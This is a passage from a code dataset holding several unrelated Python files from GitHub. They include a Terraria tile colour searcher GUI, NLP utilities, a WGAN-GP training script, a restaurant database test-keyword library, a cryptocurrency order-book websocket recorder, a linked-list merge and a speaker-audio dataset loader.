200, y = 70)\n self.scrl3 = Scale(master, orient = HORIZONTAL, to = 255, command = self.scrl_method)\n self.scrl3.pack()\n self.scrl3.place(x = 200, y = 110)\n\n self.cvs = Canvas(master, bg = '#000000', width = 100, height = 100)\n self.cvs.pack()\n self.cvs.place(x = 30, y = 45)\n self.cvs1 = Canvas(master, width = 20, height = 20)\n self.cvs1.pack()\n self.cvs1.place(x = 30, y = 240)\n self.cvs2 = Canvas(master, width = 20, height = 20)\n self.cvs2.pack()\n self.cvs2.place(x = 30, y = 270)\n self.cvs3 = Canvas(master, width = 20, height = 20)\n self.cvs3.pack()\n self.cvs3.place(x = 30, y = 300)\n self.cvs4 = Canvas(master, width = 20, height = 20)\n self.cvs4.pack()\n self.cvs4.place(x = 30, y = 330)\n self.cvs5 = Canvas(master, width = 20, height = 20)\n self.cvs5.pack()\n self.cvs5.place(x = 30, y = 360)\n\n self.CheckBox = Checkbutton(master, text = 'Paintを使用する', variable = self.bool1)\n self.CheckBox.pack()\n self.CheckBox.place(x = 30, y = 160)\n\n self.button = Button(master, text = 'Search', command = self.change_label)\n self.button.pack()\n self.button.place(x = 150, y = 195)\n\n self.label4 = Label(master, textvariable = self.txt, justify = 'left')\n self.label4.pack()\n self.label4.place(x = 55, y = 240)\n\n def hexadecimal(self, rgb):\n num = hex(rgb).replace('0x', '')\n if len(num) == 1:\n num = '0' + num\n return num\n\n def rgb_to_html_color(self, r, g, b):\n color = '#' + '{}{}{}'.format(self.hexadecimal(r), self.hexadecimal(g), self.hexadecimal(b))\n return color\n\n def get_rgb(self):\n r = self.scrl1.get()\n g = self.scrl2.get()\n b = self.scrl3.get()\n return [r, g, b]\n\n def use_paint(self):\n if self.bool1.get():\n return map_colors\n else:\n return base_colors\n\n def scrl_method(self, event):\n html_color = self.rgb_to_html_color(self.get_rgb()[0], self.get_rgb()[1], self.get_rgb()[2])\n self.cvs.configure(bg = html_color)\n\n def send_message(self):\n return select_tile_combination(self.get_rgb()[0], self.get_rgb()[1], self.get_rgb()[2], self.use_paint())\n\n def send_color(self):\n index = return_min_scores(self.get_rgb()[0], self.get_rgb()[1], self.get_rgb()[2], self.use_paint())\n color1 = self.rgb_to_html_color(map_colors[index[0][1]][0], map_colors[index[0][1]][1], map_colors[index[0][1]][2])\n self.cvs1.create_rectangle(0, 0, 25, 25, fill = color1)\n color2 = self.rgb_to_html_color(map_colors[index[1][1]][0], map_colors[index[1][1]][1], map_colors[index[1][1]][2])\n self.cvs2.create_rectangle(0, 0, 25, 25, fill = color2)\n color3 = self.rgb_to_html_color(map_colors[index[2][1]][0], map_colors[index[2][1]][1], map_colors[index[2][1]][2])\n self.cvs3.create_rectangle(0, 0, 25, 25, fill = color3)\n color4 = self.rgb_to_html_color(map_colors[index[3][1]][0], map_colors[index[3][1]][1], map_colors[index[3][1]][2])\n self.cvs4.create_rectangle(0, 0, 25, 25, fill = color4)\n color5 = self.rgb_to_html_color(map_colors[index[4][1]][0], map_colors[index[4][1]][1], map_colors[index[4][1]][2])\n self.cvs5.create_rectangle(0, 0, 25, 25, fill = color5)\n\n def change_label(self):\n self.cvs1.delete('all')\n self.cvs2.delete('all')\n self.cvs3.delete('all')\n self.cvs4.delete('all')\n self.cvs5.delete('all')\n self.txt.set(self.send_message())\n self.send_color()\n\n\n# コンフィグの読み込みに失敗した時に投げられる\nclass BadConfigException(BaseException):\n 'Raises when config load fails'\n\n#検索に使用するリスト\ndata = json.load(open('MapColor.json'))\npaint_dictionary = data['Paints']\nbase_dictionary = data['Tiles'] + data['Walls']\nwall_start = len(data['Tiles'])\npaint_start = len(base_dictionary)\nbase_colors = [[int(color) for color in item['color'].split(',')] for item in base_dictionary]\npaint_colors = [[int(color) for color in paint['color'].split(',')] for paint in paint_dictionary]\npainted_colors = [painted_color(base_colors[i], paint_colors[j], i >= wall_start)\n for j in range(len(paint_colors))\n for i in range(len(base_colors))]\nmap_colors = base_colors + painted_colors\n\n# 計算関数名と関数のペア\navailable_matrices = {'absolute': lambda rgb1, rgb2: abs(rgb2[0] - rgb1[0]) + abs(rgb2[1] - rgb1[1]) + abs(rgb2[2] - rgb1[2]),\n 'euclid': color_helper.euclidean_distance,\n 'cie-lab': color_helper.lab_difference}\n\n# コンフィグの読み込み\nconfig_file_name = 'config.json'\nif os.path.exists(config_file_name):\n with open(config_file_name) as f:\n config = json.load(f)\n if not config['matrix'] in available_matrices:\n raise BadConfigException('The matrix `{}` is not available. Please specify from [{}]'.format(config['matrix'], ', '.join(available_matrices.keys())))\nelse:\n # デフォルトを設定してコンフィグを作成\n config = {'matrix': 'cie-lab'}\n with open(config_file_name, 'w') as f:\n json.dump(config, f, indent=4, sort_keys=True)\n\nif __name__ == '__main__':\n root = Tk()\n root.title('Terraria Tile Searcher')\n root.geometry('340x430')\n RgbInputFrame(root)\n root.mainloop()\n","repo_name":"NobodyGonbe/terraria_tile_searcher","sub_path":"tile_searcher.py","file_name":"tile_searcher.py","file_ext":"py","file_size_in_byte":9335,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"71560329522","text":"import copy\nimport hashlib\nimport pickle\nimport subprocess\nimport time\nfrom pathlib import Path\nfrom typing import Set, List, Tuple, Union\n\nimport pandas as pd\nimport spacy\nfrom pydantic import BaseModel\nfrom spacy.lang.en import English\nfrom spacy.tokens import Doc, Token\n\n\nclass Shell(BaseModel):\n verbose: bool = True\n\n @classmethod\n def format_kwargs(cls, **kwargs) -> str:\n outputs = []\n for k, v in kwargs.items():\n k = k.replace(\"_\", \"-\")\n k = f\"--{k}\"\n outputs.extend([k, str(v)])\n return \" \".join(outputs)\n\n def run_command(self, command: str) -> str:\n # Continuously print outputs for long-running commands\n # Refer: https://fabianlee.org/2019/09/15/python-getting-live-output-from-subprocess-using-poll/\n print(dict(command=command))\n process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE)\n outputs = []\n\n while True:\n if process.poll() is not None:\n break\n o = process.stdout.readline().decode()\n if o:\n outputs.append(o)\n if self.verbose:\n print(o.strip())\n\n return \"\".join(outputs)\n\n def run(self, command: str, *args, **kwargs) -> str:\n args = [str(a) for a in args]\n command = \" \".join([command] + args + [self.format_kwargs(**kwargs)])\n return self.run_command(command)\n\n\ndef hash_text(x: str) -> str:\n return hashlib.md5(x.encode()).hexdigest()\n\n\nclass Timer(BaseModel):\n name: str = \"\"\n start: float = 0.0\n\n def __enter__(self):\n self.start = time.time()\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n duration = round(time.time() - self.start, 3)\n print(f\"Timer {self.name}: {duration}s\")\n\n\nclass PickleSaver(BaseModel):\n path: Path\n\n def dump(self, obj):\n if not self.path.parent.exists():\n self.path.parent.mkdir(exist_ok=True)\n with open(self.path, \"wb\") as f:\n pickle.dump(obj, f)\n\n def load(self):\n with Timer(name=str(self.path)):\n with open(self.path, \"rb\") as f:\n return pickle.load(f)\n\n\nclass FlexiModel(BaseModel):\n class Config:\n arbitrary_types_allowed = True\n\n\ndef get_simple_stats(numbers: List[Union[int, float]]):\n return dict(min=min(numbers), max=max(numbers), avg=sum(numbers) / len(numbers),)\n\n\ndef count_joins(spans: Set[Tuple[int, int]]) -> int:\n count = 0\n for a_start, a_end in spans:\n for b_start, b_end in spans:\n if (a_start, a_end) == (b_start, b_end):\n continue\n\n if b_start <= a_start <= b_end + 1 or b_start - 1 <= a_end <= b_end:\n count += 1\n return count // 2\n\n\ndef test_spacy():\n texts = [\n \"Autonomous cars are bad because they shift liability to manufacturers.\",\n \"I enjoyed this book very much.\",\n \"The design is nice and convenient.\",\n \"this speaker sucks\",\n \"I was disappointed in this.\",\n ]\n nlp: English = spacy.load(\"en_core_web_sm\")\n token: Token\n doc: Doc\n for doc in nlp.pipe(texts):\n records = []\n for token in doc:\n records.append(\n dict(\n i=token.i,\n text=token.text,\n pos=token.pos_,\n dep=token.dep_,\n head=token.head,\n head_pos=token.head.pos_,\n children=list(token.children),\n )\n )\n print(pd.DataFrame(records))\n print(dict(chunks=list(doc.noun_chunks)))\n print(\"#\" * 80)\n\n\ndef update_nested_dict(d: dict, k: str, v, i=0, sep=\"__\"):\n d = copy.deepcopy(d)\n keys = k.split(sep)\n assert keys[i] in d.keys(), str(dict(keys=keys, d=d, i=i))\n if i == len(keys) - 1:\n orig = d[keys[i]]\n if v != orig:\n print(dict(updated_key=k, new_value=v, orig=orig))\n d[keys[i]] = v\n else:\n d[keys[i]] = update_nested_dict(d=d[keys[i]], k=k, v=v, i=i + 1)\n return d\n\n\ndef test_update_nested_dict():\n d = dict(top=dict(middle_a=dict(last=1), middle_b=0))\n print(update_nested_dict(d, k=\"top__middle_b\", v=-1))\n print(update_nested_dict(d, k=\"top__middle_a__last\", v=-1))\n print(update_nested_dict(d, k=\"top__middle_a__last\", v=1))\n\n\nif __name__ == \"__main__\":\n test_shell()\n test_spacy()\n test_update_nested_dict()\n","repo_name":"FengLingCong13/SBSK-ASTE","sub_path":"aste/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4491,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"75"} +{"seq_id":"71077357042","text":"import torch\nimport torchvision\nfrom tqdm import tqdm\n\nfrom torch.utils.tensorboard import SummaryWriter\n\nimport argparse\n\ntorch.manual_seed(0)\n\n\nclass Discriminator(torch.nn.Module):\n def __init__(self, img_size, n_ch):\n super(Discriminator, self).__init__()\n self.img_size = img_size\n self.n_ch = n_ch\n self.img_shape = (n_ch, img_size, img_size)\n self.main = torch.nn.Sequential(\n torch.nn.Flatten(1, -1),\n torch.nn.Linear(img_size*img_size, 1024),\n torch.nn.LeakyReLU(0.2),\n torch.nn.Dropout(0.3),\n\n torch.nn.Linear(1024, 512),\n torch.nn.LeakyReLU(0.2),\n torch.nn.Dropout(0.3),\n\n torch.nn.Linear(512, 256),\n torch.nn.LeakyReLU(0.2),\n torch.nn.Dropout(0.3),\n\n torch.nn.Linear(256, 1),\n # torch.nn.Sigmoid()\n # Very helpful to comment last sigmoid activation\n )\n return\n\n def forward(self, x):\n return self.main(x)\n\n\nclass Generator(torch.nn.Module):\n def __init__(self, dim_noise, img_size, n_ch):\n super(Generator, self).__init__()\n self.img_size = img_size\n self.n_ch = n_ch\n self.img_shape = (n_ch, img_size, img_size)\n self.main = torch.nn.Sequential(\n torch.nn.Linear(dim_noise, 256),\n torch.nn.LeakyReLU(0.2),\n\n torch.nn.Linear(256, 512),\n torch.nn.LeakyReLU(0.2),\n\n torch.nn.Linear(512, 1024),\n torch.nn.LeakyReLU(0.2),\n\n torch.nn.Linear(1024, img_size*img_size),\n torch.nn.Tanh(),\n torch.nn.Unflatten(1, self.img_shape)\n )\n return\n\n def forward(self, x):\n return self.main(x)\n\n\nclass GAN:\n def __init__(self, dim_noise, lr_d, lr_g, d_step, n_epoch, img_size, n_ch, gp_lambda, beta_1, beta_2):\n self.dim_noise = dim_noise\n self.lr_d = lr_d\n self.lr_g = lr_g\n self.gp_lambda = gp_lambda\n self.d_step = d_step\n self.n_epoch = n_epoch\n self.img_size = img_size\n self.n_ch = n_ch\n self.img_shape = (n_ch, img_size, img_size)\n\n self.discriminator = Discriminator(img_size=img_size, n_ch=n_ch)\n self.generator = Generator(self.dim_noise, img_size=self.img_size, n_ch=n_ch)\n\n self.generator.cuda()\n self.discriminator.cuda()\n\n self.criterion = torch.nn.BCELoss()\n\n self.g_optim = torch.optim.Adam(self.generator.parameters(), lr=self.lr_g, betas=(beta_1, beta_2))\n self.d_optim = torch.optim.Adam(self.discriminator.parameters(), lr=self.lr_d, betas=(beta_1, beta_2))\n return\n\n def train(self, train_loader, test_loader):\n\n writer = SummaryWriter()\n\n test_noise = torch.randn(64, self.dim_noise, device=\"cuda:0\")\n for i in range(self.n_epoch):\n\n epoch_loss_d = 0.\n epoch_loss_g = 0.\n epoch_score_p = 0.\n epoch_score_f = 0.\n\n self.generator.train()\n self.discriminator.train()\n with tqdm(total=len(train_loader), desc=f\"epoc{i+1}\") as pbar:\n for k, (data_real, lbl) in enumerate(train_loader):\n data_real = data_real.cuda()\n\n d_loss, p_score, f_score = self.train_discriminator(data_real)\n g_loss = self.train_generator(data_real.shape[0])\n\n epoch_loss_d += d_loss\n epoch_loss_g += g_loss\n epoch_score_f += f_score\n epoch_score_p += p_score\n\n pbar.set_postfix({\"d_loss\": d_loss, \"g_loss\": g_loss,\n \"p_score\": p_score, \"f_score\": f_score})\n pbar.update()\n epoch_loss_g = epoch_loss_g/(k+1)\n epoch_loss_d = epoch_loss_d/(k+1)\n epoch_score_p /= k+1\n epoch_score_f /= k+1\n pbar.set_postfix({\"epoch: d_loss\": epoch_loss_d, \"g_loss\": epoch_loss_g,\n \"p_score\": epoch_score_p, \"f_score\": epoch_score_f})\n\n writer.add_scalar('loss/generator', epoch_loss_g, i)\n writer.add_scalar('loss/discriminator', epoch_loss_d, i)\n writer.add_scalar('score/real', epoch_score_p, i)\n writer.add_scalar('score/fake', epoch_score_f, i)\n self.generator.eval()\n self.discriminator.eval()\n test_img = self.generator(test_noise)\n test_img = (test_img + 1.0)/2.0 # denorm\n writer.add_images('img', test_img, i)\n return\n\n def train_discriminator(self, data_real):\n d_loss = 0.\n score_p = 0.\n score_f = 0.\n n_real = data_real.shape[0]\n\n for _d_n in range(self.d_step):\n\n data_fake = self.generate_fake(n_real).detach()\n mix_noise = torch.rand(n_real, 1, 1, 1).cuda()\n data_mixed = (1-mix_noise) * data_real + mix_noise * data_fake\n data_mixed = data_mixed.detach()\n data_mixed.requires_grad_()\n\n p_f = self.discriminator(data_fake)\n p_p = self.discriminator(data_real)\n p_mix = self.discriminator(data_mixed)\n\n loss_1 = p_f - p_p\n\n # gradient penalty\n grad_p_x = torch.autograd.grad(p_mix.sum(), data_mixed, retain_graph=True, create_graph=True)[0]\n # p_mix.sum(), trick to cal \\par y_i / \\parx_i independentl\n assert grad_p_x.shape == data_mixed.shape\n grad_norm = torch.sqrt(grad_p_x.square().sum(axis=(1, 2, 3)) + 1e-14)\n loss_2 = self.gp_lambda * torch.square(grad_norm - 1.)\n\n loss = loss_1 + loss_2\n loss = loss.mean()\n self.d_optim.zero_grad()\n loss.backward()\n self.d_optim.step()\n\n score_p += p_p.mean().item()\n score_f += p_f.mean().item()\n d_loss += loss.item()\n return d_loss/self.d_step, score_p/self.d_step, score_f/self.d_step\n\n def train_generator(self, batch_size):\n g_loss = 0.\n\n fake = self.generate_fake(batch_size)\n p_f = self.discriminator(fake)\n loss = -p_f.mean()\n\n self.g_optim.zero_grad()\n loss.backward()\n self.g_optim.step()\n\n g_loss += loss.item()\n\n return g_loss\n\n def generate_fake(self, n_fake):\n noise = torch.randn(n_fake, self.dim_noise, device=\"cuda:0\")\n return self.generator(noise)\n\n\ndef main(args):\n torch.random.manual_seed(0)\n\n if args.data == 'MNIST':\n m_transform = torchvision.transforms.Compose([torchvision.transforms.ToTensor(),\n torchvision.transforms.Normalize([0.5], [0.5])])\n else:\n raise Exception['you have not defined this dataset']\n data_train = torchvision.datasets.MNIST(root=args.data_root,transform=m_transform, train=True,\n download=True)\n data_test = torchvision.datasets.MNIST(root=args.data_root, transform=m_transform, train=False)\n\n train_loader = torch.utils.data.DataLoader(dataset=data_train, batch_size=args.batch_size,\n shuffle=True, drop_last=False)\n test_loader = torch.utils.data.DataLoader(dataset=data_test, batch_size=args.batch_size,\n shuffle=True, drop_last=False)\n gan = GAN(dim_noise=args.dim_noise, lr_d=args.lr_d, lr_g=args.lr_g,n_ch=args.n_ch,\n d_step=args.d_step, n_epoch=args.num_epochs, img_size=args.img_size,\n gp_lambda=args.gp_lambda, beta_1=args.beta1, beta_2=args.beta2)\n gan.train(train_loader, test_loader)\n return\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"parse args\")\n parser.add_argument('--data', required=True, help='MNIST|HAM10000')\n parser.add_argument('--data-root', default='~/Documents/datas/MNIST_data/')\n parser.add_argument('-n', '--num-epochs', default=200, type=int, help='number of training epochs')\n parser.add_argument('--lr-d', default=2e-4, type=float)\n parser.add_argument('--lr-g', default=2e-4, type=float)\n parser.add_argument('--beta1', default=0.5)\n parser.add_argument('--beta2', default=0.999)\n parser.add_argument('--gp_lambda', default=10, type=float, help='for wgan-gp, gradient penalty parameter')\n parser.add_argument('--n_ch', default=1, type=int, help='number of channels of figure')\n parser.add_argument('--img-size', default=28, type=int)\n parser.add_argument('--dim-noise', default=128, type=int)\n parser.add_argument(\"--d-step\", default=5, type=int)\n parser.add_argument('--batch-size', default=512)\n args = parser.parse_args()\n main(args)\n","repo_name":"im-Kitsch/DLMB","sub_path":"toy_task/GAN/WGAN/wgan_gp.py","file_name":"wgan_gp.py","file_ext":"py","file_size_in_byte":8790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"26616459808","text":"from robot.api.deco import keyword\nfrom libraries.db.KjtDbLibrary.dto.restaurantdetails import RestaurantDetails\nfrom autocore.AssertsLibrary import assert_equal\nfrom autocore.bases import DBLibraryComponent\nfrom autocore import envlabels\n\nclass Restaurant(DBLibraryComponent):\n\n @keyword(tags=(\"kjt\", \"restaurant\"))\n def query_restaurant_details_from_restaurant_table(self, rid: str, include_html: bool = False, _: RestaurantDetails = None) -> RestaurantDetails:\n \"\"\"Query the restaurant details using the provided ``rid`` and return the details as `RestaurantDetails`.\n - ``include_html`` - if ``True``, will include the following values in the returned object: ``comment``, ``lunchDinnerAppInfo``,\n ``creditCardsInfo``, ``sizeInfo``. Default value is ``False``.\n \"\"\"\n query = \"SELECT x.* FROM kjt.restaurant x where rid = %s;\"\n results = self.db.execute(query, (rid,))\n if len(results) == 0:\n raise Exception(\"The query did not return any results.\")\n \n result = results[0]\n details = RestaurantDetails(\n rid=result['rid'],\n enName=result['enName'],\n cnName=result['cnName'],\n exName=result['exName'],\n status=result['status'],\n openTime=result['openTime'],\n rejectTime=result['rejectTime'],\n closeTime=result['closeTime'],\n callCtrRank=result['callCtrRank'],\n disableCallPriority=result['disableCallPriority'],\n hasDelivery=result['hasDelivery'],\n hasLunchSpecial=result['hasLunchSpecial'],\n hasDinnerSpecial=result['hasDinnerSpecial'],\n hasComboApp=result['hasComboApp'],\n hasCancelOrder=result['hasCancelOrder'],\n printMethod=result['printMethod'],\n dishTax=result['dishTax'],\n deliverTax=result['deliverTax'],\n deliveryFee=result['deliveryFee'],\n convenienceFee=result['convenienceFee'],\n convenienceTax=result['convenienceTax'],\n minimumDelivery=result['minimumDelivery'],\n matchMinimumDelivery=result['matchMinimumDelivery'],\n travelMode=result['travelMode'],\n forwardedPhone=result['forwardedPhone'],\n contactPhone1=result['contactPhone1'],\n contactPhone2=result['contactPhone2'],\n contactPhone3=result['contactPhone3'],\n smsPhone=result['smsPhone'],\n hasSmsEnabled=result['hasSmsEnabled'],\n fax=result['fax'],\n address1=result['address1'],\n address2=result['address2'],\n city=result['city'],\n state=result['state'],\n zipcode=result['zipcode'],\n hourText=result['hourText'],\n website=result['website'],\n creditCards=result['creditCards'],\n creditCardMask=result['creditCardMask'],\n displayMask=result['displayMask'],\n languageMask=result['languageMask'],\n ccZipCode=result['ccZipCode'],\n ccCvc=result['ccCvc'],\n ccSplit=result['ccSplit'],\n ccSwipeInStore=result['ccSwipeInStore'],\n preauthcarate=result['preauthcarate'],\n separateOrder=result['separateOrder'],\n separateOrderFeeType=result['separateOrderFeeType'],\n separateOrderFeeAmount=result['separateOrderFeeAmount'],\n etZoneOffset=result['etZoneOffset'],\n notes=result['notes'],\n closingRemark=result['closingRemark'],\n pickupClosingRemark=result['closingRemark'],\n deliveryClosingRemark=result['deliveryClosingRemark'],\n groupMask=result['groupMask'],\n minAssignedAgents=result['minAssignedAgents'],\n maxBenchedAgents=result['maxBenchedAgents'],\n mistakeRateThreshold=result['mistakeRateThreshold'],\n createTime=result['createTime'],\n updateTime=result['updateTime']\n )\n if include_html:\n details['comment'] = result['comment']\n details['lunchDinnerAppInfo'] = result['lunchDinnerAppInfo']\n details['creditCardsInfo'] = result['creditCardsInfo']\n details['sizeInfo'] = result['sizeInfo']\n\n self.logger.pretty_debug(details)\n return details\n \n @keyword(tags=(\"kjt\", \"restaurant\"))\n def restaurant_type_based_on_restaurant_table_should_be(self, rid: str, exp_resto_type: str, no_check_in_prod: bool = False):\n \"\"\"Verify the type of the restaurant with the provided``rid``.\n - ``exp_resto_type``: Accepted values are: ``external``, ``pos_only``, ``oo_only``, ``pos_and_oo``\n \"\"\"\n if no_check_in_prod and self.globals.env == envlabels.PROD_ENV:\n self.logger.info(f\"No checking of restaurant type was made.\")\n return\n \n possible_exp_resto_type = ['external', 'pos_only','oo_only', 'pos_and_oo']\n exp_resto_type = exp_resto_type.lower().replace(\" \",\"\")\n \n if exp_resto_type not in possible_exp_resto_type:\n raise Exception(f\"Please make sure that the value of exp_resto_type is any of {possible_exp_resto_type}\")\n \n resto_details = self.query_restaurant_details_from_restaurant_table(rid=rid)\n cc_mask = resto_details['creditCardMask']\n if cc_mask is None:\n raise Exception(f\"Restaurant with rid: {rid} has no credit card mask.\")\n cc_mask = int(cc_mask)\n \n if cc_mask < 32:\n act_resto_type = 'external'\n elif cc_mask >= 128 and cc_mask < 160:\n act_resto_type = 'pos_only'\n elif cc_mask >= 160 and cc_mask < 192:\n act_resto_type = 'oo_only'\n elif cc_mask >= 192 and cc_mask < 224:\n act_resto_type = 'pos_and_oo'\n else:\n raise Exception(f\"Cannot identify type of restaurant with rid: {rid}. Actual credit card mask: {cc_mask}\")\n \n assert_equal(actual=act_resto_type, exp=exp_resto_type, desc=\"Restaurant type.\")\n\n\n @keyword(tags=(\"kjt\", \"restaurant\"))\n def restaurant_status_based_on_restaurant_table_should_be(self, rid: str, exp_status: str):\n resto_details = self.query_restaurant_details_from_restaurant_table(rid=rid)\n act_status = resto_details['status']\n assert_equal(actual=act_status, exp=exp_status, desc=\"Restaurant Status\")\n\n","repo_name":"acecalimag/ace-autobot-usereditors","sub_path":"libraries/db/KjtDbLibrary/keywords/restaurant.py","file_name":"restaurant.py","file_ext":"py","file_size_in_byte":6414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"71478597361","text":"from scripts.data import AnimalData\nfrom scripts.model import AnimalClassifier\n\n\n# --------------\n# Step 1\n# getting test data\ndata_o = AnimalData()\n# data_o.create_preprocessed_images()\ntest_files_path = data_o.get_test_files_path()\n\n# --------------\n# Step 2\n# building model\nclf_o = AnimalClassifier()\nclf_model = clf_o.get_model()\n\n\n\n# --------------\n# Step 3\n# recognize images\n# test_img = 1\n# clf_o.recognize_animals(clf_model, arr_images_path=test_files_path)\nclf_o.recognize_animal(clf_model, img_path=test_files_path[5])\n","repo_name":"evgen-ryzhkov/animals_clf_cnn_inception","sub_path":"scripts/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"74434164721","text":"############################################\n##\n## Estalishes a websocket of gdax\n## Subscribe level2 ob\n## Write data into a csv\n##\n## Yi Bao 06/14/2018\n##\n############################################\nimport websockets, asyncio\nimport json\nimport csv\nimport pprint\n\nurl = \"wss://ws-feed.gdax.com\"\nf = open(\"level2.csv\", \"w\")\n\n''' \"changes\" is a list of [\"side\", \"price\", \"size\"] '''\ncsv_columns = [\"time\", \"product_id\", \"side\", \"price\", \"size\", \"type\"]\nwriter = csv.DictWriter(f, fieldnames = csv_columns)\nwriter.writeheader()\nasync def start_gdax_websocket():\n async with websockets.connect(url) as websocket:\n await websocket.send(build_request())\n async for m in websocket:\n #print(m)\n j = json.loads(m)\n ''' the first message is asks, bids and channels '''\n if \"channels\" in j or \"asks\" in j:\n continue\n pprint.pprint(j)\n \n j[\"side\"] = j[\"changes\"][0][0]\n j[\"price\"] = j[\"changes\"][0][1]\n j[\"size\"] = j[\"changes\"][0][2]\n\n entry = {k: j[k] for k in csv_columns}\n writer.writerow(entry)\n f.flush()\n\n\ndef build_request():\n return '{ \\\n \"type\": \"subscribe\", \\\n \"product_ids\": [\"BTC-USD\"], \\\n \"channels\": [ \\\n \"level2\" \\\n ] \\\n }'\n\n\ndef main():\n asyncio.get_event_loop().run_until_complete(start_gdax_websocket())\n \nif __name__==\"__main__\":\n main()\n","repo_name":"cqbaoyi/crypto","sub_path":"ws_level2.py","file_name":"ws_level2.py","file_ext":"py","file_size_in_byte":1498,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"70637159922","text":"from myLinkedList import LinkedList\n# Singly-linked lists are already defined with this interface:\nclass ListNode(object):\n def __init__(self, x):\n self.value = x\n self.next = None\n\ndef mergeTwoLinkedLists(l1, l2):\n if not l1 and not l2:\n return None\n if not l1:\n return l2\n if not l2:\n return l1\n if l1.value > l2.value:\n l3 = ListNode(l2.value)\n l2 = l2.next\n else:\n l3 = ListNode(l1.value)\n l1 = l1.next\n \n l3_head = l3\n\n while l1 and l2:\n if l1.value > l2.value:\n curr = ListNode(l2.value)\n l2 = l2.next\n l3.next = curr \n else:\n curr = ListNode(l1.value)\n l1 = l1.next \n l3.next = curr\n l3 = curr\n \n while l1:\n curr = ListNode(l1.value)\n l1 = l1.next \n l3.next = curr\n l3 = curr\n \n while l2:\n curr = ListNode(l2.value)\n l2 = l2.next \n l3.next = curr\n l3 = curr\n \n return l3_head\n \n \n\nl1 = LinkedList()\nl1.push(4)\nl1.push(2)\nl1.push(1)\nl1.push(1)\n\nl2 = LinkedList()\nl2.push(5)\nl2.push(3)\nl2.push(0)\n\nprint(mergeTwoLinkedLists(l1.head, l2.head))","repo_name":"jaynilpatel/codesignal","sub_path":"Interview Practice/Linked Lists/mergeTwoLinkedLists.py","file_name":"mergeTwoLinkedLists.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"71120382002","text":"# dataset.py\nimport os\nimport pickle\n\nimport torch\nfrom torch.utils.data import DataLoader, ConcatDataset\nfrom datasets import load_dataset\nfrom sklearn.preprocessing import LabelEncoder\nimport torchaudio\nfrom tqdm import tqdm\nimport numpy as np\n\n\n# Load all splits of the dataset\nos.makedirs('data/voxceleb1', exist_ok=True)\nfrom torchaudio.datasets import VoxCeleb1Identification # noqa: E402\n\ndataset_dict = {\n 'train': ConcatDataset([\n load_dataset(\"edinburghcstr/ami\", \"ihm\", split='train', cache_dir=\"data/ami\"),\n VoxCeleb1Identification(root='data/voxceleb1', subset='train', download=True)\n ]),\n 'validation': ConcatDataset([\n load_dataset(\"edinburghcstr/ami\", \"ihm\", split='validation', cache_dir=\"data/ami\"),\n VoxCeleb1Identification(root='data/voxceleb1', subset='dev', download=True)\n ])\n}\n\n# File path to save/load the LabelEncoder\nencoder_filepath = \"data/encoder.pkl\"\n\n\ndef get_speaker_ids(example):\n if isinstance(example, tuple):\n return str(f\"voxceleb1-{example[2]}\")\n else:\n return example.get('speaker_id', 'NO_SPEAKER')\n\n\n# Check if the encoder file exists\nif os.path.isfile(encoder_filepath):\n # Load the encoder from file\n with open(encoder_filepath, \"rb\") as f:\n encoder = pickle.load(f)\nelse:\n # Create and fit a LabelEncoder to all the speaker_ids in all splits of the dataset\n encoder = LabelEncoder()\n all_speaker_ids = []\n print(\"Starting to fit the LabelEncoder...\")\n for split in dataset_dict.keys():\n # use 'NO_SPEAKER' if no speaker_id is provided\n dataset_split = dataset_dict[split]\n for example in tqdm(dataset_split, desc=f'Processing {split} dataset'):\n speaker_id = get_speaker_ids(example)\n all_speaker_ids.append(speaker_id)\n\n encoder.fit(all_speaker_ids)\n\n # Save the encoder to file\n with open(encoder_filepath, \"wb\") as f:\n pickle.dump(encoder, f)\n\n # Print the number of unique speaker_ids\n num_unique_speakers = len(set(all_speaker_ids))\n print(f\"Number of unique speaker IDs: {num_unique_speakers}\")\n\n\nclass CustomSubset(torch.utils.data.Subset):\n def __init__(self, dataset, indices):\n super().__init__(dataset, indices)\n\n def __getitem__(self, idx):\n data = self.dataset[self.indices[idx]]\n if isinstance(data, dict): # if data is a dictionary, use the key\n return data['audio']['array'], data['speaker_id']\n elif isinstance(data, tuple): # if data is a tuple, use the indices\n return data[0].flatten(), str(f\"voxceleb1-{data[2]}\")\n else:\n raise ValueError('Data type not recognized. It should be either a dictionary or a tuple.')\n\n\ndef get_dataloader(split, feature_type='melspectrogram', batch_size=4, n_mels=128,\n max_duration=20, hop_duration=15, sample_rate=16000, lite=None):\n # Check feature type and create corresponding transform\n assert feature_type in ['melspectrogram', 'mfcc'], \"Feature type must be either 'melspectrogram' or 'mfcc'\"\n if feature_type == 'melspectrogram':\n transform = torchaudio.transforms.MelSpectrogram(n_mels=n_mels).to(torch.float32)\n else:\n transform = torchaudio.transforms.MFCC(n_mfcc=n_mels).to(torch.float32)\n\n max_length_samples = int(max_duration * sample_rate)\n hop_length_samples = int(hop_duration * sample_rate)\n\n dataset = dataset_dict[split]\n\n if lite is not None:\n if split == \"train\":\n indices = list(range(lite))\n dataset = CustomSubset(dataset, indices)\n elif split == \"validation\":\n indices = list(range(lite // 4))\n dataset = CustomSubset(dataset, indices)\n\n def collate_fn(examples):\n audios = []\n speaker_ids = []\n for example in examples:\n if isinstance(example, dict): # if data is a dictionary, use the key\n audio_tensor = example['audio']['array']\n speaker_id = example['speaker_id']\n elif isinstance(example, tuple): # if data is a tuple, use the indices\n audio_tensor = example[0].flatten()\n speaker_id = str(f\"voxceleb1-{example[2]}\")\n\n # Check if the audio_tensor is a numpy array and convert to tensor if needed\n if isinstance(audio_tensor, 